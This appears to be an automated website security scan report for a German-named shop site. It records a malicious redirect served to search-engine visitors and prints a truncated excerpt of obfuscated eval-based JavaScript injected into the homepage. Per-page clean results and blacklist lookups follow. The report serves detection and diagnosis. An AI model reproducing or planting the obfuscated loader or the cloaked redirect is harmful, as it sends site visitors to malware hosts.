Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://media-aktuell-online.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: media-aktuell-online.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 23 Jun 2014 08:08:59 GMT Location: http://piopo.25u.com/ Server: Apache/2.2.16 (Debian) Vary: Accept-Encoding Content-Type: text/html X-Pad: avoid browser bug X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
Request | Server response | Status |
http://media-aktuell-online.com/ | 200 OK Content-Length: 35462 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{document.body++}catch(dgsgsdg){zxc=1;}try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){if("".substr)ev=eval;} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4 Antivirus reports:
| ||
http://media-aktuell-online.com/account.php?XTCsid=sfna3troicdocirkndvpgi46d3 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=23ivktca23i75hq1nit25ca7m7 | 200 OK Content-Length: 31326 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=dumlqps6mdudrcghglargb41g4 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=ak0qea09sdcmh0favd33hvt054 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=i2spu4rsvbk0nhbb29om940lc6 | 200 OK Content-Length: 31353 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=hkojsgl689mrnpbjvebvfe6os1 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=n4vrsa8u9pkvpq2riu6gk84e80 | 200 OK Content-Length: 31362 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=fvec1o92lai5fhvulmqsh21sl6 | 200 OK Content-Length: 31362 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=fuv8lo6kp624ufcu1u28fitr03 | 200 OK Content-Length: 31326 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=ok8u3q7teq06qanbq8a5mrq5h2 | 200 OK Content-Length: 31326 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=guqu0u5827eu1v0bqo98l4ncb3 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=ensikhi9mdj3q9irl47f3ot5m2 | 200 OK Content-Length: 31362 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=ehbqgni4helm3g5reepf1se8k7 | 200 OK Content-Length: 31285 Content-Type: text/html | clean |
http://media-aktuell-online.com/account.php?XTCsid=usme40s34pk4cfhl3tv8o2iiu1 | 200 OK Content-Length: 31350 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=media-aktuell-online.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://media-aktuell-online.com/
Result: media-aktuell-online.com is not infected or malware details are not published yet.
Result: media-aktuell-online.com is not infected or malware details are not published yet.